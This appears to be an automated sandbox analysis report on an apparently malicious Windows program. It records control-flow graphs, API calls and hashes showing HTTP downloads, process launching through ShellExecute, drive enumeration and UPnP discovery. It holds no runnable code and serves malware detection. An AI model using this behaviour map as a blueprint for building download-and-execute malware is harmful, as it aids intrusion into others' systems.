                                                                                control_flow_graph 709 40e070-40e10b memset InternetCrackUrlA InternetOpenA 710 40e111-40e144 InternetConnectA 709->710 711 40e287-40e290 709->711 712 40e27a-40e281 InternetCloseHandle 710->712 713 40e14a-40e17a HttpOpenRequestA 710->713 712->711 714 40e180-40e197 HttpSendRequestA 713->714 715 40e26d-40e274 InternetCloseHandle 713->715 716 40e260-40e267 InternetCloseHandle 714->716 717 40e19d-40e1a1 714->717 715->712 716->715 718 40e256 717->718 719 40e1a7 717->719 718->716 720 40e1b1-40e1b8 719->720 721 40e249-40e254 720->721 722 40e1be-40e1e0 InternetReadFile 720->722 721->716 723 40e1e2-40e1e9 722->723 724 40e1eb 722->724 723->724 725 40e1ed-40e244 call 40a490 memcpy 723->725 724->721 725->720
                                                                                APIs
                                                                                • memset.NTDLL ref: 0040E098
                                                                                • InternetCrackUrlA.WININET(0040DB49,00000000,10000000,0000003C), ref: 0040E0E8
                                                                                • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0040E0F8
                                                                                • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040E131
                                                                                • HttpOpenRequestA.WININET(00000000,GET,?,00000000,00000000,00000000,00000000,00000000), ref: 0040E167
                                                                                • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0040E18F
                                                                                • InternetReadFile.WININET(00000000,?,00000400,?), ref: 0040E1D8
                                                                                • memcpy.NTDLL(00000000,?,00000000), ref: 0040E22A
                                                                                • InternetCloseHandle.WININET(00000000), ref: 0040E267
                                                                                • InternetCloseHandle.WININET(00000000), ref: 0040E274
                                                                                • InternetCloseHandle.WININET(00000000), ref: 0040E281
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.1579577467.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000005.00000002.1579557365.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1579593026.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1579607717.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_3193211493.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Internet$CloseHandle$HttpOpenRequest$ConnectCrackFileReadSendmemcpymemset
                                                                                • String ID: <$GET
                                                                                • API String ID: 1205665004-427699995
                                                                                • Opcode ID: b5606582fcf9fad391a6fa346b47e70fe2b71523f8a0056a0553dfb9fae7cb88
                                                                                • Instruction ID: 8a187a806069c9ef74607f7bf39df95f2c1829c28a5b92bcc4b0b83bf30a7a56
                                                                                • Opcode Fuzzy Hash: b5606582fcf9fad391a6fa346b47e70fe2b71523f8a0056a0553dfb9fae7cb88
                                                                                • Instruction Fuzzy Hash: 16512DB1941228ABDB36CB50CC55BE9B3BCAB48705F1444E9F60DAA2C0D7B96BC4CF54

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • Sleep.KERNEL32(000003E8), ref: 00406B5E
                                                                                • GetModuleFileNameW.KERNEL32(00000000,0041A428,00000104), ref: 00406B70
                                                                                  • Part of subcall function 0040EC20: CreateFileW.KERNEL32(00406B80,80000000,00000001,00000000,00000003,00000000,00000000,00406B80), ref: 0040EC40
                                                                                  • Part of subcall function 0040EC20: GetFileSize.KERNEL32(000000FF,00000000), ref: 0040EC55
                                                                                  • Part of subcall function 0040EC20: CloseHandle.KERNEL32(000000FF), ref: 0040EC62
                                                                                • ExitThread.KERNEL32 ref: 00406CDA
                                                                                  • Part of subcall function 00406340: GetLogicalDrives.KERNEL32 ref: 00406346
                                                                                  • Part of subcall function 00406340: RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer,00000000,00020019,?), ref: 00406394
                                                                                  • Part of subcall function 00406340: RegQueryValueExW.ADVAPI32(?,NoDrives,00000000,00000000,00000000,00000004), ref: 004063C1
                                                                                  • Part of subcall function 00406340: RegCloseKey.ADVAPI32(?), ref: 004063DE
                                                                                • Sleep.KERNEL32(000007D0), ref: 00406CCD
                                                                                  • Part of subcall function 00406260: lstrcpyW.KERNEL32(?,?), ref: 004062B3
                                                                                • GetVolumeInformationW.KERNEL32(?,?,00000105,00000000,00000000,?,00000000,00000000), ref: 00406C0F
                                                                                • GetDiskFreeSpaceExW.KERNEL32(?,00000000,?,00000000), ref: 00406C24
                                                                                • _aulldiv.NTDLL(?,?,40000000,00000000), ref: 00406C3F
                                                                                • wsprintfW.USER32 ref: 00406C52
                                                                                • wsprintfW.USER32 ref: 00406C72
                                                                                • wsprintfW.USER32 ref: 00406C95
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.1579577467.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000005.00000002.1579557365.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1579593026.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1579607717.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_3193211493.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Filewsprintf$CloseSleep$CreateDiskDrivesExitFreeHandleInformationLogicalModuleNameOpenQuerySizeSpaceThreadValueVolume_aulldivlstrcpy
                                                                                • String ID: (%dGB)$%s%s$Unnamed volume
                                                                                • API String ID: 1650488544-2117135753
                                                                                • Opcode ID: 6d9c390415530bf0d7068dac02101ca91c021f24dc2fb290cfd9444ed22e654c
                                                                                • Instruction ID: 453264953970db4b87c24ab6cdbfc4a104d47f91dccd03b52bb95ce70ceb3e7a
                                                                                • Opcode Fuzzy Hash: 6d9c390415530bf0d7068dac02101ca91c021f24dc2fb290cfd9444ed22e654c
                                                                                • Instruction Fuzzy Hash: E041A9B1940218BBE714DB94DD55FEE7378BB48700F0081BAF20AB61D0DA785B94CF6A

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 749 40ec70-40ecaf CreateFileW 750 40ecb5-40ecd0 CreateFileMappingW 749->750 751 40edca-40edce 749->751 752 40edc0-40edc4 CloseHandle 750->752 753 40ecd6-40ecef MapViewOfFile 750->753 754 40edd0-40edf0 CreateFileW 751->754 755 40ee24-40ee2a 751->755 752->751 756 40ecf5-40ed0b GetFileSize 753->756 757 40edb6-40edba CloseHandle 753->757 758 40edf2-40ee12 WriteFile CloseHandle 754->758 759 40ee18-40ee21 call 40a660 754->759 760 40ed11-40ed24 call 40cca0 756->760 761 40edac-40edb0 UnmapViewOfFile 756->761 757->752 758->759 759->755 760->761 766 40ed2a-40ed39 760->766 761->757 766->761 767 40ed3b-40ed6a call 40c640 766->767 767->761 770 40ed6c-40ed97 call 40a990 memcmp 767->770 770->761 773 40ed99-40eda5 call 40a660 770->773 773->761
                                                                                APIs
                                                                                • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000), ref: 0040ECA2
                                                                                • CreateFileMappingW.KERNEL32(000000FF,00000000,00000002,00000000,00000000,00000000), ref: 0040ECC3
                                                                                • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 0040ECE2
                                                                                • GetFileSize.KERNEL32(000000FF,00000000), ref: 0040ECFB
                                                                                • memcmp.NTDLL ref: 0040ED8D
                                                                                • UnmapViewOfFile.KERNEL32(00000000), ref: 0040EDB0
                                                                                • CloseHandle.KERNEL32(00000000), ref: 0040EDBA
                                                                                • CloseHandle.KERNEL32(000000FF), ref: 0040EDC4
                                                                                • CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000000,00000000), ref: 0040EDE3
                                                                                • WriteFile.KERNEL32(000000FF,00000000,00000000,00000000,00000000), ref: 0040EE08
                                                                                • CloseHandle.KERNEL32(000000FF), ref: 0040EE12
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.1579577467.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000005.00000002.1579557365.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1579593026.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1579607717.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_3193211493.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: File$CloseCreateHandle$View$MappingSizeUnmapWritememcmp
                                                                                • String ID:
                                                                                • API String ID: 3902698870-0
                                                                                • Opcode ID: 643dd6457151afb767136b96de088e300be71ca2aa9c529637807d59cb8df3e5
                                                                                • Instruction ID: 32b63ebe374edb734f10ceafdcfe6a9e739b08b32ae31a868bafe8a6799fa03f
                                                                                • Opcode Fuzzy Hash: 643dd6457151afb767136b96de088e300be71ca2aa9c529637807d59cb8df3e5
                                                                                • Instruction Fuzzy Hash: 20514EB4E40209FBDB14DFA4CC49BDEB774AB48704F108569E611B72C0D7B9AA40CB98
                                                                                APIs
                                                                                • GetCurrentThread.KERNEL32 ref: 0040D786
                                                                                • GetThreadPriority.KERNEL32(00000000,?,?,?,00407F75,?,000000FF), ref: 0040D78D
                                                                                • GetCurrentThread.KERNEL32 ref: 0040D798
                                                                                • SetThreadPriority.KERNEL32(00000000,?,?,?,00407F75,?,000000FF), ref: 0040D79F
                                                                                • InterlockedExchangeAdd.KERNEL32(00407F75,00000000), ref: 0040D7C2
                                                                                • EnterCriticalSection.KERNEL32(000000FB), ref: 0040D7F7
                                                                                • WaitForSingleObject.KERNEL32(000000FF,00000000), ref: 0040D842
                                                                                • LeaveCriticalSection.KERNEL32(000000FB), ref: 0040D85E
                                                                                • Sleep.KERNEL32(00000001), ref: 0040D88E
                                                                                • GetCurrentThread.KERNEL32 ref: 0040D89D
                                                                                • SetThreadPriority.KERNEL32(00000000,?,?,?,00407F75), ref: 0040D8A4
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.1579577467.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000005.00000002.1579557365.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1579593026.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1579607717.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_3193211493.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Thread$CurrentPriority$CriticalSection$EnterExchangeInterlockedLeaveObjectSingleSleepWait
                                                                                • String ID:
                                                                                • API String ID: 3862671961-0
                                                                                • Opcode ID: a6592383c0f5364e70b0f454a5c96517dd5f3d581be9e9b029ccc77ff023b2d7
                                                                                • Instruction ID: 6fb5641eb3e61aabfeb8d94b6f23565c140e371fca94fd76c4ad34d85bd1d77f
                                                                                • Opcode Fuzzy Hash: a6592383c0f5364e70b0f454a5c96517dd5f3d581be9e9b029ccc77ff023b2d7
                                                                                • Instruction Fuzzy Hash: 32414C75E00209EBCB04EFE4D848BAEBB71EF44305F10C16AE916A7384D6789A85CF55
                                                                                APIs
                                                                                • memset.NTDLL ref: 0040EE3E
                                                                                • memset.NTDLL ref: 0040EE4E
                                                                                • CreateProcessW.KERNEL32(00000000,00407896,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 0040EE87
                                                                                • Sleep.KERNEL32(000003E8), ref: 0040EE97
                                                                                • ShellExecuteW.SHELL32(00000000,open,00407896,00000000,00000000,00000000), ref: 0040EEB2
                                                                                • Sleep.KERNEL32(000003E8), ref: 0040EECC
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.1579577467.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000005.00000002.1579557365.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1579593026.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1579607717.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_3193211493.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Sleepmemset$CreateExecuteProcessShell
                                                                                • String ID: $D$open
                                                                                • API String ID: 3787208655-2182757814
                                                                                • Opcode ID: aaa8efd2447e76ebee4be6377d3fcdc8a7337733f8d70036db534e1e8db572fc
                                                                                • Instruction ID: ab95b539b52ee8c861e7b35bb7843e11e17158efae48c82db73052011d4181fd
                                                                                • Opcode Fuzzy Hash: aaa8efd2447e76ebee4be6377d3fcdc8a7337733f8d70036db534e1e8db572fc
                                                                                • Instruction Fuzzy Hash: F2113071A4430CBAEB10DB90DD46FDE7764AB14B00F104125FA057E2C0D6F5AA548759
                                                                                APIs
                                                                                • InterlockedExchange.KERNEL32(?,00000000), ref: 00401D86
                                                                                • InterlockedDecrement.KERNEL32(?), ref: 00401DB0
                                                                                • InterlockedDecrement.KERNEL32(?), ref: 00401DC3
                                                                                • InterlockedExchangeAdd.KERNEL32(?,?), ref: 00401DD4
                                                                                • InterlockedDecrement.KERNEL32(?), ref: 00401E5B
                                                                                • InterlockedDecrement.KERNEL32(?), ref: 00401EF6
                                                                                • setsockopt.WS2_32 ref: 00401F2C
                                                                                • closesocket.WS2_32(?), ref: 00401F39
                                                                                  • Part of subcall function 0040D950: NtQuerySystemTime.NTDLL(0040B865), ref: 0040D95A
                                                                                  • Part of subcall function 0040D950: RtlTimeToSecondsSince1980.NTDLL ref: 0040D968
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.1579577467.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000005.00000002.1579557365.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1579593026.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1579607717.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_3193211493.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Interlocked$Decrement$ExchangeTime$QuerySecondsSince1980Systemclosesocketsetsockopt
                                                                                • String ID:
                                                                                • API String ID: 671207744-0
                                                                                • Opcode ID: ae0f208c7e5ebe03a9eed9973f4c7fb273d4e64238f42e24874dbd14c375a4e9
                                                                                • Instruction ID: 68686fb6eff55c499ad5be399ae1fa7ea08460e57826cc3027d59358e60976cc
                                                                                • Opcode Fuzzy Hash: ae0f208c7e5ebe03a9eed9973f4c7fb273d4e64238f42e24874dbd14c375a4e9
                                                                                • Instruction Fuzzy Hash: 34519E75608B02ABC704DF39D488B9BFBE4BF88314F44872EF89983360D775A5458B96
                                                                                APIs
                                                                                • recvfrom.WS2_32(000000FF,?,00000400,00000000,00000000,00000000), ref: 0040DD8E
                                                                                • Sleep.KERNEL32(000003E8), ref: 0040DD9E
                                                                                • StrCmpNIA.SHLWAPI(?,HTTP/1.1 200 OK,0000000F), ref: 0040DDBB
                                                                                • StrStrIA.SHLWAPI(?,LOCATION: ), ref: 0040DDD1
                                                                                • StrChrA.SHLWAPI(?,0000000D), ref: 0040DDFE
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.1579577467.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000005.00000002.1579557365.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1579593026.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1579607717.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_3193211493.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Sleeprecvfrom
                                                                                • String ID: HTTP/1.1 200 OK$LOCATION:
                                                                                • API String ID: 668330359-3973262388
                                                                                • Opcode ID: eefe196d39f416e400a4d4ef2e05462a5a71bb0c03a382919cece79f19d7d758
                                                                                • Instruction ID: 7b96b2f8d6d36e055c6c7570a615b3eea8bd5cb55d36e980e60cabbeadb8daeb
                                                                                • Opcode Fuzzy Hash: eefe196d39f416e400a4d4ef2e05462a5a71bb0c03a382919cece79f19d7d758
                                                                                • Instruction Fuzzy Hash: 78216FB5940218ABDB20DB64DC49BE97774AF04308F1085E9E709BB2D0D6B95AC6CF9C
                                                                                APIs
                                                                                • InternetOpenA.WININET(Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36,00000001,00000000,00000000,00000000), ref: 0040EEF7
                                                                                • InternetOpenUrlA.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 0040EF16
                                                                                • HttpQueryInfoA.WININET(00000000,20000005,?,00000004,00000000), ref: 0040EF3F
                                                                                • InternetCloseHandle.WININET(00000000), ref: 0040EF68
                                                                                • InternetCloseHandle.WININET(00000000), ref: 0040EF72
                                                                                • Sleep.KERNEL32(000003E8), ref: 0040EF7D
                                                                                Strings
                                                                                • Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36, xrefs: 0040EEF2
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.1579577467.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000005.00000002.1579557365.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1579593026.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1579607717.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_3193211493.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Internet$CloseHandleOpen$HttpInfoQuerySleep
                                                                                • String ID: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
                                                                                • API String ID: 2743515581-2272513262
                                                                                • Opcode ID: be2b98b0d1d94f3769b5301c8c7766c76a7eb5c2fd3991898107c864a0abb6dc
                                                                                • Instruction ID: 09246262baac8142bf73057cdf9805b9640511cbdee0a0d8a20d2e1b7007a2ac
                                                                                • Opcode Fuzzy Hash: be2b98b0d1d94f3769b5301c8c7766c76a7eb5c2fd3991898107c864a0abb6dc
                                                                                • Instruction Fuzzy Hash: 6A210A75A40309FBDB10DFA4CC49FEEB775AB08705F1085A9FA11AB2C0C7B96A44CB59
                                                                                APIs
                                                                                • InitializeCriticalSection.KERNEL32(0041AE68,?,?,?,?,?,?,00407EF9), ref: 0040B77B
                                                                                • CreateFileW.KERNEL32(0041AC50,80000000,00000000,00000000,00000003,00000000,00000000), ref: 0040B7CD
                                                                                • CreateFileMappingW.KERNEL32(000000FF,00000000,00000002,00000000,00000000,00000000), ref: 0040B7EE
                                                                                • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 0040B80D
                                                                                • GetFileSize.KERNEL32(000000FF,00000000), ref: 0040B822
                                                                                • UnmapViewOfFile.KERNEL32(00000000), ref: 0040B888
                                                                                • CloseHandle.KERNEL32(00000000), ref: 0040B892
                                                                                • CloseHandle.KERNEL32(000000FF), ref: 0040B89C
                                                                                  • Part of subcall function 0040D950: NtQuerySystemTime.NTDLL(0040B865), ref: 0040D95A
                                                                                  • Part of subcall function 0040D950: RtlTimeToSecondsSince1980.NTDLL ref: 0040D968
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.1579577467.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000005.00000002.1579557365.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1579593026.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1579607717.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_3193211493.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: File$CloseCreateHandleTimeView$CriticalInitializeMappingQuerySecondsSectionSince1980SizeSystemUnmap
                                                                                • String ID:
                                                                                • API String ID: 439099756-0
                                                                                • Opcode ID: c6295368b3329a36b4d5b539f0c7913c2e24e4bff1a22c952df061e282144c4a
                                                                                • Instruction ID: 479a2d3db74d12cc9ab5db8b9028aebaa0e2ca82416c5c7c2c0831f1d1863687
                                                                                • Opcode Fuzzy Hash: c6295368b3329a36b4d5b539f0c7913c2e24e4bff1a22c952df061e282144c4a
                                                                                • Instruction Fuzzy Hash: FB417C75E40309ABDB10EFA4CC4ABAEB774EB44704F20842AFA11B72D1C7B96541CB9D
                                                                                APIs
                                                                                • InitializeCriticalSection.KERNEL32(0041A400,?,?,?,?,?,00407EC3), ref: 00405B6B
                                                                                • CreateFileW.KERNEL32(0041A630,80000000,00000000,00000000,00000003,00000000,00000000,?,?,?,?,?,00407EC3), ref: 00405B85
                                                                                • CreateFileMappingW.KERNEL32(000000FF,00000000,00000002,00000000,00000000,00000000), ref: 00405BA6
                                                                                • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 00405BC5
                                                                                • GetFileSize.KERNEL32(000000FF,00000000), ref: 00405BDE
                                                                                • UnmapViewOfFile.KERNEL32(00000000), ref: 00405C6B
                                                                                • CloseHandle.KERNEL32(00000000), ref: 00405C75
                                                                                • CloseHandle.KERNEL32(000000FF), ref: 00405C7F
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.1579577467.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000005.00000002.1579557365.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1579593026.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1579607717.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_3193211493.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: File$CloseCreateHandleView$CriticalInitializeMappingSectionSizeUnmap
                                                                                • String ID:
                                                                                • API String ID: 3956458805-0
                                                                                • Opcode ID: 284b283459330de0b1143f1684a29cd07a22339025804f57593563af66457d89
                                                                                • Instruction ID: 34cf97d68150feb52ab64e4c1d62c08212747bf40ca63f75f299d91bb9f0c47d
                                                                                • Opcode Fuzzy Hash: 284b283459330de0b1143f1684a29cd07a22339025804f57593563af66457d89
                                                                                • Instruction Fuzzy Hash: 5D313A74A40308EBEB10DBA4CD4ABAFB770EB44704F208529E601772D0D7B96A81CF99
                                                                                APIs
                                                                                • EnterCriticalSection.KERNEL32(0041A400,00000000,0040BDA2,006A0266,?,0040BDBE,00000000,0040D09C,?), ref: 0040600F
                                                                                • memcpy.NTDLL(?,00000000,00000100), ref: 004060A1
                                                                                • CreateFileW.KERNEL32(0041A630,40000000,00000000,00000000,00000002,00000002,00000000), ref: 004061C5
                                                                                • WriteFile.KERNEL32(000000FF,?,?,?,00000000), ref: 00406227
                                                                                • FlushFileBuffers.KERNEL32(000000FF), ref: 00406233
                                                                                • CloseHandle.KERNEL32(000000FF), ref: 0040623D
                                                                                • LeaveCriticalSection.KERNEL32(0041A400,?,?,?,?,?,?,0040BDBE,00000000,0040D09C,?), ref: 00406248
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.1579577467.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000005.00000002.1579557365.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1579593026.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1579607717.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_3193211493.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: File$CriticalSection$BuffersCloseCreateEnterFlushHandleLeaveWritememcpy
                                                                                • String ID:
                                                                                • API String ID: 1457358591-0
                                                                                • Opcode ID: 7d39a30a029986bca7bb4f0c5866fafd33a6f5de3b8d974b21aec683df7cdf74
                                                                                • Instruction ID: 2241f90cca7a27a2546e95c76b2552fd8efe4d50fa40d22b7b041634b3385480
                                                                                • Opcode Fuzzy Hash: 7d39a30a029986bca7bb4f0c5866fafd33a6f5de3b8d974b21aec683df7cdf74
                                                                                • Instruction Fuzzy Hash: 4271CFB4E002099BCB04CF94D985FEFB7B1AB48304F14857DE505BB382D779A951CBA6
                                                                                APIs
                                                                                • lstrcmpiW.KERNEL32(00000000,device), ref: 0040E7AC
                                                                                • lstrcmpiW.KERNEL32(00000000,00000000), ref: 0040E7FB
                                                                                • SysFreeString.OLEAUT32(00000000), ref: 0040E80F
                                                                                • SysFreeString.OLEAUT32(00000000), ref: 0040E827
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.1579577467.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000005.00000002.1579557365.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1579593026.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1579607717.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_3193211493.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: FreeStringlstrcmpi
                                                                                • String ID: device$deviceType
                                                                                • API String ID: 1602765415-3511266565
                                                                                • Opcode ID: 566d6412d8e9607f6d1003a374969e2899c9cbeba23211f1a4d6a59564ece201
                                                                                • Instruction ID: 7a529818069a58d4d2ae4584624926d6a8b7ee91a4ee1179ae14f9cec19009dd
                                                                                • Opcode Fuzzy Hash: 566d6412d8e9607f6d1003a374969e2899c9cbeba23211f1a4d6a59564ece201
                                                                                • Instruction Fuzzy Hash: FC412AB5A0020ADFCB04DF99C884BAFB7B9FF48304F108569E515A7390D778AE85CB94
                                                                                APIs
                                                                                • lstrcmpiW.KERNEL32(00000000,service), ref: 0040E64C
                                                                                • lstrcmpiW.KERNEL32(00000000,00000000), ref: 0040E69B
                                                                                • SysFreeString.OLEAUT32(00000000), ref: 0040E6AF
                                                                                • SysFreeString.OLEAUT32(00000000), ref: 0040E6C7
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.1579577467.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000005.00000002.1579557365.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1579593026.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1579607717.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_3193211493.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: FreeStringlstrcmpi
                                                                                • String ID: service$serviceType
                                                                                • API String ID: 1602765415-3667235276
                                                                                • Opcode ID: 4e76592112a6a420ff5714064f2ae1a029c18f39b0799c1555199cf660da6998
                                                                                • Instruction ID: 0dd75c4ae2219cb0414d4c222623d171442623ab9389109279868d9d6e555a3a
                                                                                • Opcode Fuzzy Hash: 4e76592112a6a420ff5714064f2ae1a029c18f39b0799c1555199cf660da6998
                                                                                • Instruction Fuzzy Hash: FA413C74A0020ADFCB04CF99D884BAFB7B5BF58304F508969E505A7390D779EA91CF94
                                                                                APIs
                                                                                • EnterCriticalSection.KERNEL32(?,?,?,?,?,004019BB,00000000), ref: 004022DA
                                                                                • LeaveCriticalSection.KERNEL32(?,?,?,004019BB,00000000), ref: 004022FE
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.1579577467.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000005.00000002.1579557365.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1579593026.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1579607717.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
